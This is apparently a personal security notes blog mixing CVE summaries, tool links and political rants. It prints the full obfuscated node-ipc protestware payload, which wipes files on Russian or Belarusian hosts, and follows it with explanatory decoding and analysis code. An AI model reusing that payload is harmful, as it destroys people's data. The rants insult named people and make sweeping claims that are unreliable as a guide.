Notes


CVE-2022-22274 - Unauth Stack-Based Buffer Overflow Vulnerability In SonicOS

A stack-based buffer overflow vulnerability in SonicOS, reachable via an HTTP request, allows a remote unauthenticated attacker to cause a Denial of Service (DoS) or potentially achieve code execution on the firewall.

SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall.

SonicWall strongly urges organizations using the impacted SonicWall firewalls listed below to follow the provided guidance.

NOTE: This vulnerability ONLY impacts the “web management” interface, the SonicOS SSLVPN interface is not impacted. CVE-2022-22274 - Unauthenticated Stack-Based Buffer Overflow Vulnerability In SonicOS

HardeningKitty and Windows 10 Hardening

This is a hardening checklist that can be used in private and business environments for hardening Windows 10. The checklist can be used for all Windows versions, but in Windows 10 Home the Group Policy Editor is not integrated and the adjustment must be done directly in the registry. For this, there is the HailMary mode from HardeningKitty.

The settings should be seen as security and privacy recommendations and should be carefully checked to see whether they will affect the operation of your infrastructure or impact the usability of key functions. It is important to weigh security against usability. HardeningKitty and Windows 10 Hardening

Infoooze - Open-source intelligence (OSINT) tool

Infoooze is an Open-source intelligence (OSINT) tool in NodeJs. It provides various modules that allow efficient searches. Infoooze

Anony🐭 'hacks' Central Bank of the Russian Federation

Anony🐭
Apparently, Anony🐭 posted the promised files following the results of the “hacking” of the Central Bank of the Russian Federation. Why the quotes around hacking, you might ask. Well, the group formerly known as NSA’s lapdog published almost 20GB of publicly available information and various outdated garbage, public reports from 2010-2016 and open data on licenses and beneficiaries.

I’d link some screenshots into the “leaked” public files but it’s just not worth my time. Feel free to dig in if you have the time.

Remember when Anony🐭 distributed a copy of the VLC player with their “hacked” data? Yeah.

Large-scale npm attack targets Azure developers with malicious packages

The JFrog Security research team continuously monitors popular open source software (OSS) repositories with our automated tooling to avert potential software supply chain security threats, and reports any vulnerabilities or malicious packages discovered to repository maintainers and the wider community.

Two days ago, several of our automated analyzers started alerting on a set of packages in the npm Registry. This particular set of packages steadily grew over a few days, from about 50 packages to more than 200 packages (as of March 21st). Large-scale npm attack targets Azure developers with malicious packages

Gone in 52 seconds, a comparative analysis of ransomware encryption speed

Why? Well, partly because we have an unlimited Splunk license, but also because we couldn’t find the answer to the question: “How long do you have until ransomware encrypts your systems?” This seems like knowledge that organizations could use to organize their defenses. If organizations have more than 20 hours before ransomware finishes encrypting, they might choose to focus on detecting and mitigating ransomware after infection. If ransomware encrypts an entire system in 52 seconds, organizations should probably respond earlier in the ransomware lifecycle.

In our initial hypothesis, we asserted that if ransomware executes on a system, then it’s too late for an organization to respond effectively. We conducted a literature review of ransomware encryption speed and only uncovered work that was encyclopedic in scope from one of the ransomware groups themselves. Gone in 52 Seconds … and 42 Minutes: A Comparative Analysis of Ransomware Encryption Speed

How to detect IMSI catchers

IMSI catchers are one of the most effective surveillance techniques of all time. They’re used by police, governments and criminals to spy on victims’ phones. This spy tech is rarely deployed with a warrant. Western governments buy commercial products from US companies like the “Stingray” from Harris Corp. Criminals can also buy IMSI catchers from unregulated online Chinese and Israeli vendors. These IMSI catchers have been used for corporate espionage and blackmail. They’ve been found at embassies, airports, political protests and sports events.

IMSI catchers work by intercepting the traffic from all phones in an area. Operators can track a victim’s location, read their SMS, listen to phone calls and intercept data. An attacker can target thousands of devices. IMSI catchers can be mounted on people, cars or airplanes that can spy on entire cities at once. How to detect IMSI catchers

CVE-2022-0337 - Sys env variables leak on Google Chrome, Microsoft Edge and Opera

Successful exploitation of this vulnerability can lead to the leak of user secrets stored in system environment variables. The bug was found in Chromium version 92 and patched in version 97. Several web browsers are based on the Chromium engine, for instance Google Chrome, Microsoft Edge, Opera, and Brave. All of them were vulnerable, except for Brave. The vulnerability is in the File System Access API, more specifically in the window.showSaveFilePicker() method. CVE-2022-0337 System environment variables leak on Google Chrome, Microsoft Edge and Opera

Think of the children and prince Andrew

→ in reply to @note#1647515445

Think of the children! Speaking of that, what’s “prince” Andrew doing nowadays?

Chat Control - The End of the Privacy of Digital Correspondence

As if anyone still believes Europe is a place where free speech is protected by law:

On 30 March 2022 the EU Commission intends to make a second legislative proposal, which is to force all providers of email, messaging and chat services to comprehensively search all private messages in the absence of any suspicion.

According to the case-law of the European Court of Justice the permanent and comprehensive automated analysis of private communications violates fundamental rights and is prohibited (paragraph 177). For this reason, Member of the European Parliament Patrick Breyer has filed a complaint against U.S. companies Facebook and Google with the data protection authorities for violating the General Data Protection Regulation. Former judge of the European Court of Justice Prof. Dr. Ninon Colneric has extensively analysed the plans and concludes in a legal assessment that the EU legislative plans on chat control are not in line with the case law of the European Court of Justice and violate the fundamental rights of all EU citizens to respect for privacy, to data protection and to freedom of expression. Chat Control - The End of the Privacy of Digital Correspondence

How does this affect you?

  • All of your chat conversations and emails will be automatically searched for suspicious content. Nothing remains confidential or secret. There is no requirement of a court order or an initial suspicion for searching your messages. It occurs always and automatically.
  • If an algorithm classifies the content of a message as suspicious, your private or intimate photos may be viewed by staff and contractors of international corporations and police authorities. Also your private nude photos may be looked at by people not known to you, in whose hands your photos are not safe.
  • Flirts and sexting may be read by staff and contractors of international corporations and police authorities, because text recognition filters looking for “child grooming” frequently falsely flag intimate chats.
  • You can falsely be reported and investigated for allegedly disseminating child sexual exploitation material. Messaging and chat control algorithms are known to flag completely legal vacation photos of children on a beach, for example. According to Swiss federal police authorities, 86% of all machine-generated reports turn out to be without merit. 40% of all criminal investigation procedures initiated in Germany for “child pornography” target minors.
  • On your next trip overseas, you can expect big problems. Machine-generated reports on your communications may have been passed on to other countries, such as the USA, where there is no data privacy – with incalculable results.
  • Intelligence services and hackers may be able to spy on your private chats and emails. The door will be open for anyone with the technical means to read your messages if secure encryption is removed in order to be able to screen messages.
  • This is only the beginning. Once the technology for messaging and chat control has been established, it becomes very easy to use them for other purposes. And who guarantees that these incrimination machines will not be used in the future on our smart phones and laptops?

Read Patrick’s article for more information.

node-ipc is malware and its maintainer is an idiot

I deobfuscated the code above and found that if the host machine’s public IP address was from Russia or Belarus, node-ipc would proceed to overwrite many files with a heart emoji recursively while traversing up parent directories. node-ipc is malware and its maintainer, Brandon Charles Miller is an idiot | blob

import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}

Or, how to destroy your project for Internet points. Vue CLI used to depend on node-ipc 9.x, the new “code” is in node-ipc 9.2.2 and there are new versions of Vue CLI (4.5.16 and 5.0.3) that lock the dependency version.

Wow.

I think that Unity Hub uses node-ipc and because node-ipc uses the peacenotwar module, Unity Hub creates the “WITH-LOVE-FROM-AMERICA.txt” file on the desktop. Unity Hub seems to be affected too and they released a new version.
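To make the quoted sample readable without running it, the following is an added example (not code from node-ipc, from the blob post, or from Vue CLI): it decodes the base64 constants exactly as they appear in the payload and re-implements its trigger and file-walk decisions as a dry run that never calls the geolocation API and never writes a file. Only Node’s global Buffer is used; the file list and working directory in the usage are constructed inputs.

```javascript
// Added example, not code from node-ipc or from the linked write-up: the
// obfuscated constants of the node-ipc payload quoted above, decoded, and its
// trigger and file-walk logic re-implemented as a dry run that never touches
// the network or the filesystem. Only Node's global Buffer is used.

// The base64 literals exactly as they appear in the sample.
const OBFUSCATED = {
  geoApi: 'aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=',
  roots: ['Li8=', 'Li4v', 'Li4vLi4v', 'Lw=='],
  countryField: 'Y291bnRyeV9uYW1l',
  matches: ['cnVzc2lh', 'YmVsYXJ1cw=='],
  payload: '4p2k77iP',
};

const decode = (b64) => Buffer.from(b64, 'base64').toString('utf8');

// Plaintext view of the sample: the geolocation endpoint (with the author's
// API key embedded in the query string), the four walk roots, the JSON field
// and the two country substrings it matches on, and the bytes written over
// every file it reaches.
function decodedConstants() {
  return {
    geoApi: decode(OBFUSCATED.geoApi),
    roots: OBFUSCATED.roots.map(decode),
    countryField: decode(OBFUSCATED.countryField),
    matches: OBFUSCATED.matches.map(decode),
    payload: decode(OBFUSCATED.payload),
  };
}

// The sample only arms itself on some loads: Math.round(Math.random() * 4)
// must be 0 or 1, i.e. the random draw must be below 0.375.
function armedFor(randomDraw) {
  return Math.round(randomDraw * 4) <= 1;
}

// Same predicate as the sample: substring match on the lowercased
// country_name, so "Russian Federation" matches as well as "Russia".
// Any parse error is swallowed and the payload stays idle, as in the sample.
function wouldTrigger(geoResponseBody) {
  const c = decodedConstants();
  try {
    const name = String(JSON.parse(geoResponseBody)[c.countryField]).toLowerCase();
    return c.matches.some((m) => name.includes(m));
  } catch (e) {
    return false;
  }
}

// POSIX path resolution for the dry run (no `path` module needed).
function resolvePosix(cwd, rel) {
  const full = rel.startsWith('/') ? rel : cwd + '/' + rel;
  const segs = [];
  for (const s of full.split('/')) {
    if (s === '' || s === '.') continue;
    if (s === '..') segs.pop(); else segs.push(s);
  }
  return '/' + segs.join('/');
}

// Dry run of h(): given the working directory the package was loaded from and
// a constructed list of absolute file paths standing in for the filesystem,
// report which files each root would reach. h() writes the payload to every
// non-directory entry it finds (it uses lstat, so symlinks are clobbered too),
// and the last root is "/", so the walk is bounded only by permissions.
function dryRun(cwd, files) {
  const out = {};
  for (const root of decodedConstants().roots) {
    const base = resolvePosix(cwd, root);
    const prefix = base === '/' ? '/' : base + '/';
    out[root] = files.filter((f) => f.startsWith(prefix)).sort();
  }
  return out;
}

// Usage with constructed inputs:
console.log(decodedConstants());
console.log(dryRun('/home/dev/project', [
  '/home/dev/project/index.js', '/home/dev/.ssh/id_ed25519', '/etc/passwd',
]));
```

Two things the decoded view makes obvious that the minified form hides: the country check is a substring match on whatever the geolocation service returns, and the final root is "/", so on a build agent or developer box running as a permissive user the damage is not confined to the project directory.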

CVE-2022-0778 - Infinite loop in BN_mod_sqrt() reachable when parsing certs

Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.

It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters.

Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. CVE-2022-0778 - Infinite loop in BN_mod_sqrt() reachable when parsing certificates
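The root cause is algorithmic, so it can be shown without OpenSSL: BN_mod_sqrt() is a Tonelli-Shanks square root that assumes the modulus is prime, and its inner “find the least i with t^(2^i) = 1” loop had no bound. The block below is an added example, not OpenSSL’s code: a textbook Tonelli-Shanks in JavaScript BigInt arranged in the same shape, with a flag that selects the pre-fix (unbounded) or fixed (bounded) inner loop, plus a caller-side primality check. The composite modulus 221 = 13 × 17 with a = 3 is a constructed input chosen so that t^(2^i) never reaches 1; the non-residue search here uses Euler’s criterion rather than OpenSSL’s Kronecker symbol, but is capped at 82 tries as OpenSSL’s is.

```javascript
// Added example, not OpenSSL's code: Tonelli-Shanks modular square root in
// BigInt, arranged like BN_mod_sqrt(). With bounded = false the inner loop is
// the pre-fix one and never returns for the constructed input (3, 221); with
// bounded = true it fails closed as the CVE-2022-0778 fix does.

function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Returns r with r*r ≡ a (mod p), or null if no root is found or the bound trips.
// Like OpenSSL, residuosity is not checked up front; the result is verified at the end.
function modSqrt(a, p, bounded = true) {
  a = ((a % p) + p) % p;
  if (a === 0n) return 0n;
  let q = p - 1n, e = 0n;                 // p - 1 = q * 2^e, q odd
  while ((q & 1n) === 0n) { q >>= 1n; e += 1n; }
  if (e === 1n) {                         // p ≡ 3 (mod 4): direct formula, no loop
    const r = modPow(a, (p + 1n) >> 2n, p);
    return (r * r) % p === a ? r : null;
  }
  let z = 2n;                             // quadratic non-residue; OpenSSL gives up after 82 tries
  while (modPow(z, (p - 1n) >> 1n, p) !== p - 1n) {
    z += 1n;
    if (z > 82n) return null;
  }
  let m = e;
  let c = modPow(z, q, p);
  let t = modPow(a, q, p);
  let r = modPow(a, (q + 1n) >> 1n, p);
  while (t !== 1n) {
    let i = 1n, t2 = (t * t) % p;         // find least i, 0 < i < m, with t^(2^i) = 1
    while (t2 !== 1n) {
      i += 1n;
      if (bounded && i === m) return null; // the fix: not a square, or p is not prime
      t2 = (t2 * t2) % p;                  // unbounded: spins forever when the order of t is not a power of 2
    }
    let b = c;
    for (let j = 0n; j < m - i - 1n; j++) b = (b * b) % p;
    m = i; c = (b * b) % p; t = (t * c) % p; r = (r * b) % p;
  }
  return (r * r) % p === a ? r : null;
}

// Miller-Rabin with fixed small bases; deterministic well beyond the sizes used here.
function isProbablePrime(n) {
  if (n < 2n) return false;
  const bases = [2n, 3n, 5n, 7n, 11n, 13n, 17n, 19n, 23n, 29n, 31n, 37n];
  for (const b of bases) { if (n === b) return true; if (n % b === 0n) return false; }
  let d = n - 1n, r = 0n;
  while ((d & 1n) === 0n) { d >>= 1n; r += 1n; }
  witness: for (const b of bases) {
    let x = modPow(b, d, n);
    if (x === 1n || x === n - 1n) continue;
    for (let k = 1n; k < r; k++) {
      x = (x * x) % n;
      if (x === n - 1n) continue witness;
    }
    return false;
  }
  return true;
}

// Caller-side hardening: explicit EC parameters from an untrusted certificate
// should be rejected before any field arithmetic is attempted on them.
function safeModSqrt(a, p) {
  if (!isProbablePrime(p)) return null;
  return modSqrt(a, p, true);
}

// Usage: a prime field works, the constructed composite "field" fails closed.
console.log(modSqrt(10n, 13n));          // a root of 10 mod 13
console.log(modSqrt(3n, 221n));          // null (bounded); modSqrt(3n, 221n, false) would hang
console.log(safeModSqrt(3n, 221n));      // null, rejected before the loop
```

The bound alone is what the upstream fix adds (OpenSSL 1.1.1n and 3.0.2); the primality check is the extra belt-and-braces step a parser of attacker-supplied parameters should have had in the first place, since a crafted certificate can carry any p it likes and is parsed before its signature is ever checked.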

CVE-2022-0742 - Remote Denial of Service on Linux Kernel >=5.13

Flooding ICMPv6 messages of type 130 or 131 (MLD Query and MLDv1 Report) is enough to exploit a memory leak in the kernel and cause the host to go out-of-memory. The volume of traffic doesn’t need to be particularly high. Note that since the vulnerability was introduced recently (5.13) only the 5.15 stable series was affected.

This vulnerability was found/fixed by Eric Dumazet.

CVE will land on MITRE’s website sometime this week.

CVE-2022-0742: Remote Denial of Service on Linux Kernel >=5.13

Escaping privileged containers for fun

Despite the fact that it is not a ‘real’ vulnerability, escaping privileged Docker containers is nevertheless pretty funny. And because there will always be people who will come up with reasons or excuses to run a privileged container (even though you really shouldn’t), this could really be handy at some point in the future.

As a result of the recent discovery of the cgroup_release_agent escape trick (CVE-2022-0492), I went on a search for calls to the call_usermodehelper_* family and attempted to determine which ones may be easily accessed within a container environment.

Escaping privileged containers for fun

DOME - A subdomain enumeration tool

Dome is a fast and reliable Python script that performs active and/or passive scans to obtain subdomains and search for open ports. This tool is recommended for bug bounty hunters and pentesters in their reconnaissance phase.

  • up to 21 different OSINT sources
  • easily configurable with arguments
  • scan multiple domains simultaneously
  • export to various formats such as text, json, html

DOME - A subdomain enumeration tool
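The passive part of what a tool like this does is mostly normalisation: many sources, several output shapes, one deduplicated in-scope host list for the active phase to resolve and port-scan. The block below is an added example and not Dome’s code. Both inputs are constructed: one is shaped like crt.sh’s JSON output (objects with `common_name` and a newline-separated `name_value`), the other a plain “host,ip” text list as some sources return; neither is real data for any domain.

```javascript
// Added example, not Dome's code: merging passive OSINT sources into one
// deduplicated, in-scope subdomain list. The two inputs are constructed.
const SAMPLE_CT_JSON = JSON.stringify([
  { common_name: 'www.example.com', name_value: 'www.example.com\nexample.com' },
  { common_name: '*.dev.example.com', name_value: '*.dev.example.com\nAPI.dev.example.com' },
  { common_name: 'mail.example.com', name_value: 'mail.example.com\nexample.com.evil.test' },
]);
const SAMPLE_HOST_LIST =
  'vpn.example.com,192.0.2.10\nwww.example.com,192.0.2.20\nnotes.example.org,192.0.2.30\n';

// Scope check: the apex itself or any label chain ending in ".<domain>".
// The leading dot matters: "example.com.evil.test" must not pass as a subdomain.
function inScope(host, domain) {
  return host === domain || host.endsWith('.' + domain);
}

// Normalise one candidate; null if it is not a usable in-scope host.
function normalise(raw, domain) {
  let n = String(raw).trim().toLowerCase();
  if (n.startsWith('*.')) n = n.slice(2);             // wildcard cert: keep the parent label
  if (!/^[a-z0-9][a-z0-9.-]*$/.test(n)) return null;  // drop anything that is not a hostname
  return n !== domain && inScope(n, domain) ? n : null;
}

// crt.sh-shaped source: SANs arrive newline-separated in name_value.
function fromCertTransparency(ctJson, domain) {
  const names = [];
  for (const row of JSON.parse(ctJson)) {
    names.push(row.common_name, ...String(row.name_value || '').split('\n'));
  }
  return names.map((n) => normalise(n, domain)).filter(Boolean);
}

// "host,ip" text source: only the host column is of interest here.
function fromHostList(text, domain) {
  return text.split('\n')
    .map((line) => line.split(',')[0])
    .map((n) => normalise(n, domain))
    .filter(Boolean);
}

// Merge every source, deduplicate and sort; this is the input to the active phase.
function mergeSources(sources) {
  return [...new Set(sources.flat())].sort();
}

// Usage with the constructed samples:
console.log(mergeSources([
  fromCertTransparency(SAMPLE_CT_JSON, 'example.com'),
  fromHostList(SAMPLE_HOST_LIST, 'example.com'),
]));
```

The scope check is the part worth copying: a bare `includes(domain)` test lets `example.com.evil.test` through, and a wildcard entry is evidence for the parent label only, not for any particular host under it.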

When will they limit American propaganda?

New Junk Times at it again. Basically, if you’re against censorship, you’re far right.

Question: When will they limit American propaganda?

Answer: *crickets*

Don't use DuckDuckGo

Don’t use DuckDuckGo. Microsoft. Google. Facebook. Oracle. Github. Gitlab. Don’t use any USA-based services, today they might exist for you, will they exist tomorrow? Do you trust them? Don’t use cesspools like Reddit and Twitter. Get your news from neutral places, not Bezoshington Post and New War Times. Decentralize, rationalize and think, please.

Russia replacing western Internet services

Who could have guessed that Russians would just simply create new services that are not even hard to set up after NSA Anonymoose targeting their network infrastructure and slandering them? I am shocked, shocked I say! I always thought social media mobs were a good way of handling foreign policy.

Oh, journalist shitheads, remember that if you are removing Google Tag Manager from your website it means that you are disconnecting from the Internet.

Internet makes everyone channel their inner ape

Internet makes everyone, even professors and doctors, channel their inner ape.

I noticed this dynamic a while ago. Humans simply do not operate correctly if they can hide behind their actions. Ever. You will not find people who can say difficult truths online, because online you can always choose the easier path and just screech and promote your own agenda. It’s inherently impossible. Yet we’re making the Internet a bigger thing every year. The only reason civilization was able to develop is that people were responsible for their actions. Now, that is gone.

“Harmless shitposting” might actually destroy the intellectual growth of our species, because life is today more about the Internet than real life.

4chan anons preaching the truth once more.